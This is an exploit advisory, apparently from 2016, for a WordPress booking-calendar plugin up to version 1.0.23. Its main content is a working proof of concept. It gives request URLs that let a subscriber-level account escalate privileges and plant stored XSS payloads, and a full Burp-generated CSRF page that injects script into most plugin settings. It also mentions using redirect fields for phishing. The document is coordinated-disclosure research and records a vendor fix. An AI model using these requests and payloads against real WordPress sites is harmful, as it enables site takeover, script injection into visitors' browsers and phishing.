WordPress Booking Calendar Contact Form 1.0.23 CSRF / XSS
Posted on 10 February 2016
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Privilege escalation / stored XSS vulnerabilities # Date: 2016-02-08 # Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form # Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ] # Vendor Homepage: http://wordpress.dwbooster.com/ # Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form # Version: 1.0.23 # Tested on: windows 10 + firefox. ============== Description ============== Create a booking form with a reservation calendar or a classic contact form, connected to a PayPal payment button. With the **Booking Calendar Contact Form** you can create a **classic contact form** or a **booking form with a reservation calendar**, connected to a PayPal payment button. The reservation calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates. The **reservation calendar** is an optional item, so it can be disabled to create a **general purpose contact form**. There are two types of bookings available in the calendar configuration: full day bookings or partial day bookings. With full day bookings the whole day is blocked / reserved while in partial day bookings the start and end dates are partially blocked as used for example in **room/hotel bookings**. =================== Technical details =================== Booking calendar contact form plugin for wordpress is prone to multiple privilege escalation and stored XSS vulnerabilities because does not verify if a user that make a request for update the plugin options, add or delete a ´season price´ and add/delete/update an item to booking list is a privileged user and does not sanitize the supplied information. An authenticated user can exploit these vulnerabilities. ================== Proof of concept ================== 1) Add a ´season price´ with XSS Payload in parameter ´price´. http://<wp-path>/<ap-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices &add=1&dex_item=1&price=%3E%22%3Cimg%20src=x%20onerror=alert(/u_r_owned/)%3E%22%3C&dfrom=&dto 2) Delete a ´season price´ with specified ´code´ http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data &dex_bccf=loadseasonprices&delete=1&code=1 3) Own a calendars if you have an account like ´suscriptor´ role and inject a XSS payload into ´name parameter´: http://<wp-hots>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&u=<my user id>&public=1&owner=1&name=<XSS payload> 4) Update charset of booking calendar tables: http://<wp-host>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&ac=st&chs=<my supplied charset> 5) Delete a booking calendar item if you are logged in as suscriptor: http://localhost/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&list=1&ld=<id of calendar to delete> 6) Unrestricted update options / stored XSS in some parameters ( PoC html ) <html> <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin email_confirmation_to_user,calendar_language,calendar_mode,calendar_pages,currency,cv_text_enter_valid_captcha and other parameters are vulnerables to stored XSS url_ok,url_cancel can be used to redirect a user and make fishing attacks ´dex_item´ value is the ´id´ of the calendar. --> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost:80/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&r=0.5076911114737157", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1"); xhr.withCredentials = true; var body = "dex_bccf_post_options=1&dex_item=1&calendar_enabled=true&selDay_startcal1=&selMonth_startcal1=&selYear_startcal1=&selDay_endcal1=&selMonth_endcal1=&selYear_endcal1=">"<img><"&calendar_pages=2&calendar_language=">"<img><"&calendar_weekday=0&calendar_dateformat=0&calendar_overlapped=false&calendar_showcost=1&calendar_mode=">"<img><"&calendar_mindate=today&calendar_maxdate=">"<img><"&calendar_minnights=%22%3E%22%3Cimg%3E%3C%22&calendar_maxnights=%22%3E%22%3Cimg%3E%3C%22&wd1=1&wd2=1&wd3=1&wd4=1&wd5=1&wd6=1&wd7=1&sd1=1&sd2=1&sd3=1&sd4=1&sd5=1&sd6=1&sd7=1&calendar_fixedreslength=1&calendar_holidays=&calendar_startres=¤cy=%22%3E%22%3Cimg%3E%3C%22&request_cost=%22%3E%22%3Cimg%3E%3C%22&max_slots=0&calendar_suplementminnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplementmaxnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplement=%22%3E%22%3Cimg%3E%3C%22&calendar_depositenable=0&calendar_depositamount=0&calendar_deposittype=0&dex_dc_price=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dfrom=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dto=%22%3E%22%3Cimg%3E%3C%22&paypal_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&paypal_product_name=%22%3E%22%3Cimg%3E%3C%22&url_ok=http%3A%2F%2Flocalhost%2Fwordpress&url_cancel=http%3A%2F%2Flocalhost%2Fwordpress&paypal_language=%22%3E%22%3Cimg%3E%3C%22&request_taxes=%22%3E%22%3Cimg%3E%3C%22&form_structure=%5B%5B%7B%22name%22%3A%22email%22%2C%22index%22%3A0%2C%22title%22%3A%22Email%22%2C%22ftype%22%3A%22femail%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22required%22%3Atrue%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22subject%22%2C%22index%22%3A1%2C%22title%22%3A%22Subject%22%2C%22required%22%3Atrue%2C%22ftype%22%3A%22ftext%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22message%22%2C%22index%22%3A2%2C%22size%22%3A%22large%22%2C%22required%22%3Atrue%2C%22title%22%3A%22Message%22%2C%22ftype%22%3A%22ftextarea%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%7D%5D%2C%5B%7B%22title%22%3A%22%22%2C%22description%22%3A%22%22%2C%22formlayout%22%3A%22top_aligned%22%7D%5D%5D&sTitle=Email&sShortlabel=&sNametag=%3C%25email%25%3E&sName=email&sSize=medium&sRequired=on&sEqualTo=&sPredefined=&sUserhelp=&sCsslayout=&vs_text_submitbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_previousbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_nextbtn=%22%3E%22%3Cimg%3E%3C%22&vs_use_validation=DEX_BCCF_DEFAULT_vs_use_validation&vs_text_is_required=This+field+is+required.&vs_text_is_email=%22%3E%22%3Cimg%3E%3C%22%40mail.com&cv_text_enter_valid_captcha=Please+enter+a+valid+captcha+code.&vs_text_datemmddyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_dateddmmyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_number=%22%3E%22%3Cimg%3E%3C%22&vs_text_digits=%22%3E%22%3Cimg%3E%3C%22&vs_text_max=%22%3E%22%3Cimg%3E%3C%22&vs_text_min=%22%3E%22%3Cimg%3E%3C%22&cp_cal_checkboxes_type1=0&cp_cal_checkboxes1=¬ification_from_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com¬ification_destination_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&email_subject_notification_to_admin=%22%3E%22%3Cimg%3E%3C%22&email_notification_to_admin=New+reservation+made+with+the+following+information%3A%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&cu_user_email_field=email&email_subject_confirmation_to_user=%22%3E%22%3Cimg%3E%3C%22&email_confirmation_to_user=We+have+received+your+request+with+the+following+information%3A%0D%0A%0D%0A%25INFORMATION%25%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&dexcv_enable_captcha=true&dexcv_width=%22%3E%22%3Cimg%3E%3C%22&dexcv_height=%22%3E%22%3Cimg%3E%3C%22&dexcv_chars=%22%3E%22%3Cimg%3E%3C%22&dexcv_min_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_max_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise_length=%22%3E%22%3Cimg%3E%3C%22&dexcv_background=%22%3E%22%3Cimg%3E%3C%22&dexcv_border=%22%3E%22%3Cimg%3E%3C%22&dexcv_font=font-1.ttf&submit=Save+Changes"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> ========== CREDITS ========== Vulnerability discovered by: Joaquin Ramirez Martinez [i0 security-lab] joaquin.ramirez.mtz.lab[at]gmail[dot]com https://www.facebook.com/I0-security-lab-524954460988147/ https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q ======== TIMELINE ======== 2016-02-01 vulnerability discovered 2016-02-05 reported to vendor 2016-02-08 released fixed plugin v1.0.24 2016-02-08 public disclosure